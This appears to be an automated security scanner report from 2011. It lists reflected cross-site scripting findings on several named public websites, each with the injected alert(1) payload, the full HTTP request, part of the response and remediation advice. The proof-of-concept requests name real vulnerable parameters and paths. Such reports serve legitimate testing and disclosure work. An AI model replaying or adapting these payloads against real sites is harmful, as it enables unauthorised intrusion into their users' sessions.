The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64285 Date: Thu, 03 Feb 2011 17:11:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... m'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64190 Date: Thu, 03 Feb 2011 17:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:47:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index-radar.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 64616 Content-Type: text/html Cache-Control: public Date: Thu, 03 Feb 2011 16:35:04 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps-satellite.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 64040 Content-Type: text/html Cache-Control: public Date: Thu, 03 Feb 2011 16:35:14 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 35109
